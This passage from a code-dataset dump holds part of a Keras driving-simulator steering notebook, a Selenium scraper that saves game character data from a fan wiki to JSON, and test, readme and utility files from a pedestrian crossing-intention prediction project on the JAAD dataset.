throttle.append(float(row['throttle']))\n left.append(row['left'])\n center.append(row['center'])\n right.append(row['right'])\n steering.append(float(row['steering']))\n\n\n# In[15]:\n\n# Make sure the data is loaded correctly\nassert len(speed) == len(throttle) == len(left) == len(center) == len(right) == len(steering)\nprint(len(speed))\n\n\n# In[16]:\n\n# Preprocessing\ndef preprocess(image, width=200, height=66):\n processed = image[60:130, 0:320]\n processed = cv2.resize(processed, (width, height), interpolation = cv2.INTER_CUBIC)\n return processed\n\n\n# In[17]:\n\n# Build Keras model according to the NVIDIA paper\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.pooling import MaxPooling2D\nfrom keras.layers.normalization import BatchNormalization\n\nbatch_size = 100\nepochs = 5\nmodel = Sequential()\nmodel.add(BatchNormalization(input_shape=(66, 200, 3), axis=1))\nmodel.add(Convolution2D(24, 5, 5, border_mode='valid', subsample = (2,2), input_shape=(66,200,3)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(36, 5, 5, border_mode='valid', subsample = (2,2)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(48, 5, 5, border_mode='valid', subsample = (2,2)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(64, 3, 3, border_mode='valid', subsample = (1,1)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Convolution2D(64, 3, 3, border_mode='valid', subsample = 
(1,1)))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Activation('relu'))\nmodel.add(Dense(50))\nmodel.add(Activation('relu'))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\nmodel.summary()\n\n# Configures the learning process and metrics\nmodel.compile('adam', 'mean_squared_error', ['accuracy'])\n\n\n# In[18]:\n\n# Test model with a few sample images\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n# Find 3 test images: big left turn, straight run, and big right turn\nleft_turn_image_idx = 0\nstraight_image_idx = 0\nright_turn_image_idx = 0\n\nfor i in range(len(steering)):\n angle = steering[i]\n if angle < -0.4:\n left_turn_image_idx = i\n elif angle == 0:\n straight_image_idx = i\n elif angle > 0.4:\n right_turn_image_idx = i\n \nprint(steering[left_turn_image_idx], steering[straight_image_idx], steering[right_turn_image_idx])\n\nleft_turn_image_c=mpimg.imread(\"data/\"+center[left_turn_image_idx].strip())\n\nprint(left_turn_image_c.shape)\n\n\nplt.imshow(left_turn_image_c)\nplt.title(\"Original Left Turn Image. Steering angle = {}\".format(steering[left_turn_image_idx]))\nplt.show()\n\nstraight_image_c=mpimg.imread(\"data/\"+center[straight_image_idx].strip())\nplt.imshow(straight_image_c)\nplt.title(\"Original Straight Image. Steering angle = {}\".format(steering[straight_image_idx]))\nplt.show()\n\nright_turn_image_c=mpimg.imread(\"data/\"+center[right_turn_image_idx].strip())\nplt.imshow(right_turn_image_c)\nplt.title(\"Original Right Turn Image. Steering angle = {}\".format(steering[right_turn_image_idx]))\nplt.show()\n\nleft_turn_image_c_processed = preprocess(left_turn_image_c)\nplt.imshow(left_turn_image_c_processed)\nplt.title(\"Processed Left Turn Image. Steering angle = {}\".format(steering[left_turn_image_idx]))\nplt.show()\n\nstraight_image_c_processed = preprocess(straight_image_c)\nplt.imshow(straight_image_c_processed)\nplt.title(\"Processed Straight Image. Steering angle = {}\".format(steering[straight_image_idx]))\nplt.show()\n\nright_turn_image_c_processed = preprocess(right_turn_image_c)\nplt.imshow(right_turn_image_c_processed)\nplt.title(\"Processed Right Turn Image. 
Steering angle = {}\".format(steering[right_turn_image_idx]))\nplt.show()\n\n\n# In[19]:\n\n# Run test images through model\n\nx_train_data = np.array([left_turn_image_c_processed, straight_image_c_processed, right_turn_image_c_processed])\nY_train_data = np.array([steering[left_turn_image_idx], steering[straight_image_idx], steering[right_turn_image_idx]])\n\nprint((3,) + x_train_data[0].shape)\n# print(Y_train_data)\n\nhistory = model.fit(x_train_data, Y_train_data, batch_size=1, nb_epoch=5)\n\n# Calculate test score\ntest_score = model.evaluate(x_train_data, Y_train_data)\n\nprint(test_score)\nprint(model.predict(x_train_data))\n\n\n# In[21]:\n\nimport matplotlib.image as mpimg\n\n# Generate additional data using left, right and flipped images\n# 1) Choose a random index from all existing training images (~8000)\n# 2) Generate 6 images and their corresponding steering angles using the left and right camera images with a steering correction,\n# as well as the symmetries of the 3 images with respect to the vertical axis\ndef generate_data():\n while True:\n idx = randint(0, len(center)-1)\n\n cimg = preprocess(mpimg.imread(\"data/\"+center[idx].strip()))\n limg = preprocess(mpimg.imread(\"data/\"+left[idx].strip()))\n rimg = preprocess(mpimg.imread(\"data/\"+right[idx].strip()))\n cflipped = cv2.flip(cimg,1)\n lflipped = cv2.flip(limg,1)\n rflipped = cv2.flip(rimg,1)\n\n generated_images = np.array([cimg, limg, rimg, cflipped, lflipped, rflipped])\n\n steering_correction = 0.25\n\n csteering = steering[idx]\n lsteering = csteering + steering_correction\n rsteering = csteering - steering_correction\n csflipped = -csteering\n lsflipped = -lsteering\n rsflipped = -rsteering\n\n generated_steerings = np.array([csteering, lsteering, rsteering, csflipped, lsflipped, rsflipped])\n\n yield generated_images, generated_steerings \n\n\n# In[22]:\n\n# Run test images through model\nfrom random import randint\n\nx_train_data = np.array([left_turn_image_c_processed, straight_image_c_processed, right_turn_image_c_processed])\nY_train_data = np.array([steering[left_turn_image_idx], steering[straight_image_idx], steering[right_turn_image_idx]])\n\nmodel.fit_generator(generate_data(), \n samples_per_epoch=48000, # approximately len(center)*6, which should cover most images in training set\n nb_epoch=5,\n verbose=2)\n\n# Calculate test score\ntest_score = model.evaluate(x_train_data, Y_train_data)\nprint(test_score)\n# The test score is only to give an idea about the accuracy.\n# The performance of the model can only be shown in the simulator\n\nprint(model.predict(x_train_data))\n\n\n# In[23]:\n\n# Save model and weights\nimport json\n\njson_str = model.to_json()\nwith open('model.json','w') as f:\n json.dump(json_str, f)\n\nmodel.save_weights('model.h5')\n\n" } ]
3
robinsonweng/PCR_web_crawler
https://github.com/robinsonweng/PCR_web_crawler
5ec763990f3f0c8fcc32b263a78094b985be1ef5
7fb50359dc6cd3334e90a83b79143c27d290880c
d0da070871eccae1c79fce34848cb36fa2e0ddd7
refs/heads/master
2020-09-18T20:30:02.165770
2020-06-09T05:39:06
2020-06-09T05:39:06
224,179,804
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7961783409118652, "alphanum_fraction": 0.8025477528572083, "avg_line_length": 18.625, "blob_id": "d1241c88ccc6842c7c86139be5404cc76e75788a", "content_id": "6afc3999a0b956b0733c6667059309e582ace1bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 157, "license_type": "no_license", "max_line_length": 80, "num_lines": 8, "path": "/README.md", "repo_name": "robinsonweng/PCR_web_crawler", "src_encoding": "UTF-8", "text": "# PRC_web_crawler\n\nCrawling PrincessConnect:Redive charactors information into json using webdriver\n\n## Requirement\n- Selenuim\n- Beautiful soup 4\n- requests\n" }, { "alpha_fraction": 0.5629629492759705, "alphanum_fraction": 0.5774193406105042, "avg_line_length": 38.047847747802734, "blob_id": "70e14054c487fefd03c857fdb2dc231330a89f81", "content_id": "6de992aa72956d3c01e25e47127fd11bbc5b3fe4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8698, "license_type": "no_license", "max_line_length": 143, "num_lines": 209, "path": "/craw.py", "repo_name": "robinsonweng/PCR_web_crawler", "src_encoding": "UTF-8", "text": "#抓入https://pcredivewiki.tw/ 的檔案\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport asyncio, re, time, requests, json, io, colorama\r\n\r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}\r\n\r\ndef home_event():\r\n try:\r\n event_link = \"https://pcredivewiki.tw/static/data/event.json\"\r\n event_json = requests.get(event_link)\r\n except:\r\n print(\"error from request: {}\".format(event_json))\r\n\r\n raw_json = json.loads(event_json.text)\r\n sorted_json = json.dumps(raw_json, indent=4, sort_keys=True, ensure_ascii=False)\r\n\r\n eventdatafile = open(\"datafile/event.json\", \"w\",encoding='utf-8')\r\n eventdatafile.write(json.dumps(json.loads(sorted_json), indent=4, sort_keys=True, ensure_ascii=False))\r\n eventdatafile.close()\r\n \r\ndef character():\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"\")#--headless\r\n browser = webdriver.Chrome(chrome_options=chrome_options)\r\n browser.get(\"https://pcredivewiki.tw/Character\")\r\n html = browser.page_source\r\n htmlbs4 = BeautifulSoup(html, \"lxml\")\r\n\r\n #find name\r\n character_name = []\r\n for name in htmlbs4.find_all('small'):\r\n character_name.append(name.get_text())\r\n \r\n #find link\r\n character_link = []\r\n for link in htmlbs4.find_all('a'):\r\n if \"/Character/Detial/\" in link.get('href'):\r\n character_link.append(link.get('href'))\r\n \r\n #find picture path\r\n character_imgpath = []\r\n for path in htmlbs4.find_all('img', src=True, class_=True):\r\n if \"/static/images/unit/\" in path.get('src'):\r\n character_imgpath.append(path.get('src'))\r\n\r\n if len(character_imgpath) == len(character_link) == len(character_name):\r\n print(\"compare done!\")\r\n else:\r\n print(\"error! 
character info not complete!\")\r\n    \r\n    data = {}\r\n    index = 0\r\n    for name in character_name:\r\n        data[name] = [\"{}\".format(character_imgpath[index]), \"{}\".format(character_link[index])]\r\n        index += 1\r\n\r\n    character_nav = open(\"datafile/character_nav.json\", \"w\", encoding='utf8')\r\n    character_nav.write(json.dumps(data, indent=4, sort_keys=True, ensure_ascii=False))\r\n    character_nav.close()\r\n\r\ndef character_info(character_link):\r\n    \"\"\"\r\n    The output should be:\r\n    {\r\n        \"document\":{\r\n            \"name\": none,\r\n            \"birthday\": none,\r\n            \"age\": none,\r\n            \"height\": none,\r\n            \"weight\": none,\r\n            \"bloodtype\": none,\r\n            \"raise\": none,\r\n            \"hobby\": none,\r\n            \"CV\": none,\r\n            \"intro\": none\r\n        },\r\n        \"skill\": {\r\n            \"name\": [\r\n                \"ぷうきちサンタ・ストーム\",\r\n                \"ぷうきちエール\",\r\n                \"ぷうきちラッシュ\",\r\n                \"ホーリーナイトスラッガー\",\r\n                \"ホーリーナイトスラッガー+\"\r\n            ],\r\n            \"startup\": [\r\n                \"/static/images/skill/icon_skill_ap01.png\",\r\n                \"/static/images/skill/icon_skill_ap02.png\"\r\n            ],\r\n            \"loop\": [\r\n                \"/static/images/skill/icon_skill_attack.png\",\r\n                \"/static/images/skill/icon_skill_ap01.png\",\r\n                \"/static/images/skill/icon_skill_ap02.png\"\r\n            ],\r\n            \"info\": [\r\n                \"敵単体に【80.0 + 80.0*技能等級 + 7.4 *atk】の物理ダメージ\",\r\n                \"自分の物理攻撃力を【22.0 + 22.0*技能等級 】アップ\\n\\n持續時間: 10.0 秒\",\r\n                \"敵単体に【12.0 + 12.0*技能等級 + 1.0 *atk】の物理ダメージ\",\r\n                \"自分の物理攻撃力を【15.0 + 15.0*技能等級 】アップ\",\r\n                \"自分の物理攻撃力を【240.0 + 15.0*技能等級 】アップ\"\r\n            ]\r\n        },\r\n        \"specialitem\": {\r\n            \"name\": null\r\n            \"intro\": null\r\n            \"status\": null\r\n        }\r\n    }\r\n    \"\"\"\r\n    # scrape one character's detail page\r\n    chrome_options = Options()\r\n    chrome_options.add_argument(\"--headless\")\r\n    browser = webdriver.Chrome(chrome_options=chrome_options)\r\n    browser.get(character_link)\r\n    html = browser.page_source\r\n    htmlbs4 = BeautifulSoup(html, \"lxml\")\r\n    # personal profile table\r\n    character_doc = [text.get_text() for text in htmlbs4.find_all('td')]\r\n    character_key = [\"name\", \"birthday\", \"age\", \"height\", \"weight\", \"bloodtype\", \"raise\", \"hobby\", \"CV\"]\r\n    character_dict = dict(zip(character_key, character_doc))\r\n    #special item:\r\n    item_ = [item for item in htmlbs4.find_all('div', class_=\"prod-info-box unique mb-3\")]\r\n    if item_:\r\n        specialitem_name = {\"name\":[name.find('h2').get_text() for name in item_][0]}\r\n        specialitem_intro = {\"intro\":[intro.find('p').get_text() for intro in item_][0]}\r\n        specialiteminfo = []\r\n        for item in item_:\r\n            for info in item.find_all('span', class_=True):\r\n                specialiteminfo.append(info.get_text().strip())\r\n        specialitem_status = {\"status\":specialiteminfo}\r\n\r\n        skinfo = htmlbs4.find_all('div', class_=\"skill-box my-3\")\r\n        skillinfo = []\r\n        skill_name = {\"name\":[info.find('h3').get_text() for info in skinfo]}\r\n        for info in skinfo:\r\n            info.find('h3').decompose()\r\n            info.find('div', class_=re.compile(r\"skill-type\\smb-1\\s\\w+\")).decompose()\r\n            skillinfo.append(info.get_text().replace(\"\\t\", \"\"))\r\n        skill_info = {\"info\":skillinfo}\r\n        \r\n    else:\r\n        skinfo = htmlbs4.find_all('div', class_=\"skill-box my-3\")\r\n        skill_info = {\"info\":[info.find('div', class_=\"mb-3\").get_text().strip().replace(\"\\t\", \"\").replace(\"\\r\", \"\") for info in skinfo]}\r\n        skill_name = {\"name\":[info.find('h3').get_text() for info in skinfo]}\r\n        specialitem_name = {\"name\":None}\r\n        specialitem_intro = {\"intro\":None}\r\n        specialitem_status = {\"status\":None}\r\n\r\n    #intro:\r\n    character_dict['intro'] = [htmlbs4.find('span', class_=\"my-3 d-block\").get_text().replace(\"簡介\", \"\").strip()][0]\r\n 
#document:\r\n    document = {\"document\":character_dict}\r\n\r\n    startup_skill = {\"startup\":[path.get('src') for path in htmlbs4.find('div', class_=\"d-flex flex-wrap\").find_all('img')]}\r\n    \r\n    loop_ = [path for path in htmlbs4.find_all('div', class_=\"d-flex flex-wrap\")][1]\r\n    loop_skill = {\"loop\":[path.get('src') for path in loop_.find_all('img')]}\r\n    #skill\r\n    #skill = {\"skill\":{skill_name, startup_skill, loop_skill, skill_info}}\r\n    skill_name.update(startup_skill)\r\n    skill_name.update(loop_skill)\r\n    skill_name.update(skill_info)\r\n    skill = {\"skill\": skill_name} \r\n    #specialitem\r\n    specialitem_name.update(specialitem_intro)\r\n    specialitem_name.update(specialitem_status)\r\n    specialitem = {\"specialitem\": specialitem_name}\r\n    #combine document skill specialitem\r\n    #output = {f'{character_doc[0]}':dict(zip(document, skill, specialitem))}\r\n    document.update(skill)\r\n    document.update(specialitem)\r\n    output = {f'{character_doc[0]}': document}\r\n    \r\n    #convert dict into json\r\n    #print(json.dumps(output, indent=4, sort_keys=True, ensure_ascii=False))\r\n    return output\r\n\r\ndef writedatafile():\r\n    \"\"\"Read character names and links, then build the full character data file.\"\"\"\r\n\r\n    #name, character and picture link\r\n    with open(\"datafile/character_nav.json\", \"r\", encoding='utf-8') as f:\r\n        character_load = json.load(f)\r\n    link = \"https://pcredivewiki.tw/Character/Detial/\"\r\n    home = \"https://pcredivewiki.tw\"\r\n    character_list = list(character_load.keys())\r\n    character_detaillink = [f'{link}{name}' for name in character_list]\r\n\r\n    index = 0\r\n    for name in character_list:\r\n        character_dict = character_info(character_detaillink[index])\r\n        #character_datafile io\r\n        with open(\"datafile/character_datafile.json\", \"r\", encoding='utf-8') as f:\r\n            character_prev = json.load(f)\r\n        character_link = {\"link\": f'{home}{character_load[name][1]}'}\r\n        character_icon = {\"icon\": f'{home}{character_load[name][0]}'}\r\n        character_dict[name].update(character_icon)\r\n        character_dict[name].update(character_link)\r\n        print(json.dumps(character_dict, indent=4, sort_keys=True, ensure_ascii=False))\r\n\r\n        with open(\"datafile/character_datafile.json\", \"w+\", encoding='utf-8') as f:\r\n            character_prev.update(character_dict)\r\n            json.dump(character_prev, f, indent=4, sort_keys=True, ensure_ascii=False)\r\n        print(colorama.Fore.RED + f'INFO: finished the character data file for {name}\\n')\r\n        index += 1\r\n\r\nwritedatafile()\r\n" } ]
2
dschoerk/Pedestrian_Crossing_Intention_Prediction
https://github.com/dschoerk/Pedestrian_Crossing_Intention_Prediction
90caee4d709dccf8e3fa5022450b5674205f151b
046a75e1c2a623c66ac95e410c5304a4d0732ee2
c0964b69a9ed900fdf330e0b5e889ba0d89ea26e
refs/heads/main
2023-04-26T09:42:38.914654
2021-05-28T15:41:31
2021-05-28T15:41:31
371,746,200
0
0
MIT
2021-05-28T15:35:46
2021-05-25T19:33:12
2021-05-23T09:41:57
null
[ { "alpha_fraction": 0.6552567481994629, "alphanum_fraction": 0.6596577167510986, "avg_line_length": 38.346153259277344, "blob_id": "aa89149bd2f0cf3e048e35138afffe8f92f50b8e", "content_id": "7ed8052c75bfdf22ff521e621734b89ebe2a81ba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2045, "license_type": "permissive", "max_line_length": 94, "num_lines": 52, "path": "/test.py", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "from action_predict import action_prediction\n# from pie_data import PIE\nfrom jaad_data import JAAD\nimport os\nimport sys\nimport yaml\nimport tensorflow as tf\ngpus = tf.config.experimental.list_physical_devices('GPU')\nassert len(gpus) > 0, \"Not enough GPU hardware devices available\"\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n tf.config.experimental.set_virtual_device_configuration(\n gpu,\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=4096)]\n )\n\ndef test_model(saved_files_path=None):\n\n with open(os.path.join(saved_files_path, 'configs.yaml'), 'r') as yamlfile:\n opts = yaml.safe_load(yamlfile)\n print(opts)\n model_opts = opts['model_opts']\n data_opts = opts['data_opts']\n net_opts = opts['net_opts']\n\n tte = model_opts['time_to_event'] if isinstance(model_opts['time_to_event'], int) else \\\n model_opts['time_to_event'][1]\n data_opts['min_track_size'] = model_opts['obs_length'] + tte\n\n if model_opts['dataset'] == 'pie':\n pass\n # imdb = PIE(data_path=os.environ.copy()['PIE_PATH'])\n # imdb.get_data_stats()\n elif model_opts['dataset'] == 'jaad':\n # imdb = JAAD(data_path=os.environ.copy()['JAAD_PATH'])\n imdb = JAAD(data_path='/home/haolin/CITR/PedestrianActionBenchmark/JAAD/')\n else:\n raise ValueError(\"{} dataset is incorrect\".format(model_opts['dataset']))\n\n method_class = action_prediction(model_opts['model'])(**net_opts)\n #beh_seq_train = imdb.generate_data_trajectory_sequence('train', **data_opts)\n #saved_files_path = method_class.train(beh_seq_train, **train_opts, model_opts=model_opts)\n\n beh_seq_test = imdb.generate_data_trajectory_sequence('test', **data_opts)\n acc, auc, f1, precision, recall = method_class.test(beh_seq_test, saved_files_path)\n print('test done')\n print(acc, auc, f1, precision, recall)\n\n\nif __name__ == '__main__':\n saved_files_path = sys.argv[1]\n test_model(saved_files_path=saved_files_path)" }, { "alpha_fraction": 0.708108127117157, "alphanum_fraction": 0.7359886169433594, "avg_line_length": 38.05555725097656, "blob_id": "31f836acb58b796c95b564ce904053f085ee3cb8", "content_id": "c406ba5f2b67b372e9f1439797321217f39a3e09", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3515, "license_type": "permissive", "max_line_length": 399, "num_lines": 90, "path": "/readme.md", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "# Pedestrian Crossing Intention Prediction \n \n## Notification \n\n**Predicting Pedestrian Crossing Intention with Feature Fusion and Spatio-Temporal Attention.** \n\n<p align=\"center\">\n<img src=\"model.png\" alt=\"Our proposed model\" align=\"middle\" width=\"800\"/>\n</p>\n\nPaper in ArXiv: https://arxiv.org/pdf/2104.05485v1.pdf (submitted to IROS 2021) \n\nThis work improves the existing pedestrian crossing intention prediction method and achieves the latest state-of-the-art performance. 
\n\nThis work relies heavily on the pedestrian action prediction benchmark: `Kotseruba, Iuliia, Amir Rasouli, and John K. Tsotsos. \"Benchmark for Evaluating Pedestrian Action Prediction.\" In Proceedings of the IEEE/CVF Winter Conference on Applications of Computer Vision, pp. 1258-1268, 2021.`\n\n## Environment \n\npython = 3.8 \ntensorflow-gpu = 2.2 \nnumpy, opencv, PIL, matplotlib, etc \nCPU:i7-6700K, GPU:RTX-2070super \n\n## Dataset Preparation \n\nDownload the [JAAD Annotation](https://github.com/ykotseruba/JAAD) and put the `JAAD` folder in this project's root directory (as `./JAAD`). \n\nDownload the [JAAD Dataset](http://data.nvision2.eecs.yorku.ca/JAAD_dataset/), and then put the video clip folder `JAAD_clips` into `./JAAD` (as `./JAAD/JAAD_clips`). \n\nCopy `jaad_data.py` from the corresponding repository into this project's root directory (as `./jaad_data.py`). \n\nIn order to use the data, first, the video clips should be converted into images. This can be done using the script `./JAAD/split_clips_to_frames.sh` following the JAAD dataset's instructions. \n\nThe above operation will create a folder called `images` and save the extracted images grouped by corresponding video ids in the `./JAAD/images` folder. \n```\n./JAAD/images/video_0001/\n\t\t\t\t00000.png\n\t\t\t\t00001.png\n\t\t\t\t...\n./JAAD/images/video_0002/\n\t\t\t\t00000.png\n\t\t\t\t00001.png\n\t\t\t\t...\t\t\n...\n```\n## Training \n\nNote: our model extracts the semantic mask via DeeplabV3 (you need to download the pretrained segmentation model [deeplabv3](http://download.tensorflow.org/models/deeplabv3_mnv2_cityscapes_train_2018_02_05.tar.gz) before training and put the checkpoint file into this project's root directory (as `./deeplabv3_mnv2_cityscapes_train_2018_02_05.tar.gz`) so that the model can obtain the input semantic data). \n\nUse the `train_test.py` script with a `config_file`:\n```\npython train_test.py -c <config_file>\n```\n\nAll config files are saved in `./config_files` and you can review all offered model configs in `./config_files/config_list.yaml` and all offered model architectures in `./model_imgs` corresponding to the configs. \n\nFor example, to train the MASK-PCPA model run: \n\n```\npython train_test.py -c config_files/ours/MASK_PCPA_jaad_2d.yaml\n``` \n\nThe script will automatically save the trained model weights, configuration file and evaluation results in the `models/<dataset>/<model_name>/<current_date>/` folder.\n\nSee comments in `configs_default.yaml` and `action_predict.py` for parameter descriptions.\n\nModel-specific YAML files contain experiment options `exp_opts` that overwrite options in `configs_default.yaml`. \n\n\n## Test saved model \n\nTo re-run the test on a saved model use: \n\n```\npython test_model.py <saved_files_path>\n```\n\nFor example: \n```\npython test_model.py models/jaad/MASK_PCPA/xxxx/\n``` \n\nYou can download our pretrained models from [Google Drive (to do)](https://drive.google.com/drive/) \nor [BaiduDisk](https://pan.baidu.com/s/1GTvrcfe4a34sfwydVSQDqg) (password: v90h) for testing. 
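\n\nThe evaluation can also be invoked programmatically. Below is a minimal sketch, assuming this repository's `test.py` (which defines `test_model`) is importable from the project root and that `xxxx` is replaced with a real run folder; note that importing `test.py` runs its GPU checks and memory configuration at import time:\n```python\nfrom test import test_model  # test.py in this repository\n\n# hypothetical run folder; replace xxxx with an actual date-stamped directory\ntest_model(saved_files_path='models/jaad/MASK_PCPA/xxxx/')\n```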
\n\n## TODO List\n\n- [x] Readme Completion\n- [x] Pretrained Model\n- [ ] Support PIE Dataset\n" }, { "alpha_fraction": 0.5361634492874146, "alphanum_fraction": 0.5618847012519836, "avg_line_length": 32.66666793823242, "blob_id": "3bf8844a26ffbe767cb6063b1793b3ec216e5676", "content_id": "1d9e4795637b54498c7b7dc2a0cae0065696d677", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17573, "license_type": "permissive", "max_line_length": 111, "num_lines": 522, "path": "/utils.py", "repo_name": "dschoerk/Pedestrian_Crossing_Intention_Prediction", "src_encoding": "UTF-8", "text": "import sys\nimport PIL\nimport os\nimport pickle\nimport numpy as np\nimport cv2\nfrom tensorflow.keras.preprocessing.image import load_img\nfrom sklearn.metrics import accuracy_score\n\n# Data utilities\ndef flip_pose(pose):\n    \"\"\"\n    Flips the coordinates of a given pose\n    Args:\n        pose: The original pose\n    Return:\n        Flipped poses\n    \"\"\"\n    # [nose(0,1), neck(2,3), Rsho(4,5), Relb(6,7), Rwri(8,9),\n    # \t\t\t\t\t\t Lsho(10,11), Lelb(12,13), Lwri(14,15),\n    #\t\t\t\t\t\t Rhip(16,17), Rkne(18,19), Rank(20,21),\n    # Lhip(22,23), Lkne(24,25), Lank(26,27),\n    #\t\t\t\t\t\t Leye(28,29), Reye (30,31),\n    #\t\t\t\t\t\t Lear(32,33), Rear(34,35)]\n    flip_map = [0, 1, 2, 3, 10, 11, 12, 13, 14, 15, 4, 5, 6, 7, 8, 9, 22, 23, 24, 25,\n                26, 27, 16, 17, 18, 19, 20, 21, 30, 31, 28, 29, 34, 35, 32, 33]\n    new_pose = pose.copy()\n    flip_pose = [0] * len(new_pose)\n    for i in range(len(new_pose)):\n        if i % 2 == 0 and new_pose[i] != 0:\n            new_pose[i] = 1 - new_pose[i]\n        flip_pose[flip_map[i]] = new_pose[i]\n    return flip_pose\n\n\ndef get_pose(img_sequences,\n             ped_ids, file_path,\n             data_type='train',\n             dataset='pie'):\n    \"\"\"\n    Reads the pie poses from saved .pkl files\n    Args:\n        img_sequences: Sequences of image names\n        ped_ids: Sequences of pedestrian ids\n        file_path: Path to where poses are saved\n        data_type: Whether it is for training or testing\n    Return:\n        Sequences of poses\n    \"\"\"\n\n    print('\\n#####################################')\n    print('Getting poses %s' % data_type)\n    print('#####################################')\n    poses_all = []\n    set_poses_list = [x for x in os.listdir(file_path) if x.endswith('.pkl')]\n    set_poses = {}\n    for s in set_poses_list:\n        with open(os.path.join(file_path, s), 'rb') as fid:\n            try:\n                p = pickle.load(fid)\n            except:\n                p = pickle.load(fid, encoding='bytes')\n        set_poses[s.split('.pkl')[0].split('_')[-1]] = p\n    i = -1\n    for seq, pid in zip(img_sequences, ped_ids):\n        i += 1\n        update_progress(i / len(img_sequences))\n        pose = []\n        for imp, p in zip(seq, pid):\n            flip_image = False\n            \n            if dataset == 'pie':\n                set_id = imp.split('/')[-3]\n            elif dataset == 'jaad':\n                set_id = 'set01'\n            \n            vid_id = imp.split('/')[-2]\n            img_name = imp.split('/')[-1].split('.')[0]\n            if 'flip' in img_name:\n                img_name = img_name.replace('_flip', '')\n                flip_image = True\n            k = img_name + '_' + p[0]\n            if k in set_poses[set_id][vid_id].keys():\n                # [nose, neck, Rsho, Relb, Rwri, Lsho, Lelb, Lwri, Rhip, Rkne,\n                # Rank, Lhip, Lkne, Lank, Leye, Reye, Lear, Rear, pt19]\n                if flip_image:\n                    pose.append(flip_pose(set_poses[set_id][vid_id][k]))\n                else:\n                    pose.append(set_poses[set_id][vid_id][k])\n            else:\n                pose.append([0] * 36)\n        poses_all.append(pose)\n    poses_all = np.array(poses_all)\n    return poses_all\n\n\ndef jitter_bbox(img_path, bbox, mode, ratio):\n    \"\"\"\n    Jitters the position or dimensions of the bounding box.\n    Args:\n        img_path: The path to the image\n        bbox: The bounding box to be jittered\n 
mode: The mode of jittering. Options are,\n            'same' returns the bounding box unchanged\n            'enlarge' increases the size of bounding box based on the given ratio.\n            'random_enlarge' increases the size of bounding box by randomly sampling a value in [0,ratio)\n            'move' moves the center of the bounding box in each direction based on the given ratio\n            'random_move' moves the center of the bounding box in each direction by randomly\n            sampling a value in [-ratio,ratio)\n        ratio: The ratio of change relative to the size of the bounding box.\n            For modes 'enlarge' and 'random_enlarge'\n            the absolute value is considered.\n    Return:\n        Jittered bounding boxes\n    \"\"\"\n\n    assert (mode in ['same', 'enlarge', 'move', 'random_enlarge', 'random_move']), \\\n        'mode %s is invalid.' % mode\n\n    if mode == 'same':\n        return bbox\n\n    img = load_img(img_path)\n\n    if mode in ['random_enlarge', 'enlarge']:\n        jitter_ratio = abs(ratio)\n    else:\n        jitter_ratio = ratio\n\n    if mode == 'random_enlarge':\n        jitter_ratio = np.random.random_sample() * jitter_ratio\n    elif mode == 'random_move':\n        # for ratio between (-jitter_ratio, jitter_ratio)\n        # for sampling the formula is [a,b), b > a,\n        # random_sample * (b-a) + a\n        jitter_ratio = np.random.random_sample() * jitter_ratio * 2 - jitter_ratio\n\n    jit_boxes = []\n    for b in bbox:\n        bbox_width = b[2] - b[0]\n        bbox_height = b[3] - b[1]\n\n        width_change = bbox_width * jitter_ratio\n        height_change = bbox_height * jitter_ratio\n\n        if width_change < height_change:\n            height_change = width_change\n        else:\n            width_change = height_change\n\n        if mode in ['enlarge', 'random_enlarge']:\n            b[0] = b[0] - width_change // 2\n            b[1] = b[1] - height_change // 2\n        else:\n            b[0] = b[0] + width_change // 2\n            b[1] = b[1] + height_change // 2\n\n        b[2] = b[2] + width_change // 2\n        b[3] = b[3] + height_change // 2\n\n        # Checks to make sure the bbox is not exiting the image boundaries\n        b = bbox_sanity_check(img.size, b)\n        jit_boxes.append(b)\n    # elif crop_opts['mode'] == 'border_only':\n    return jit_boxes\n\n\ndef squarify(bbox, squarify_ratio, img_width):\n    \"\"\"\n    Changes the dimensions of a bounding box to a fixed ratio\n    Args:\n        bbox: Bounding box\n        squarify_ratio: Ratio to be changed to\n        img_width: Image width\n    Return:\n        Squarified bounding boxes\n    \"\"\"\n    width = abs(bbox[0] - bbox[2])\n    height = abs(bbox[1] - bbox[3])\n    width_change = height * squarify_ratio - width\n    bbox[0] = bbox[0] - width_change / 2\n    bbox[2] = bbox[2] + width_change / 2\n    # Squarify is applied to bounding boxes in Matlab coordinate starting from 1\n    if bbox[0] < 0:\n        bbox[0] = 0\n\n    # check whether the new bounding box goes beyond image borders\n    # If this is the case, the bounding box is shifted back\n    if bbox[2] > img_width:\n        # bbox[1] = str(-float(bbox[3]) + img_dimensions[0])\n        bbox[0] = bbox[0] - bbox[2] + img_width\n        bbox[2] = img_width\n    return bbox\n\n\ndef update_progress(progress):\n    \"\"\"\n    Shows the 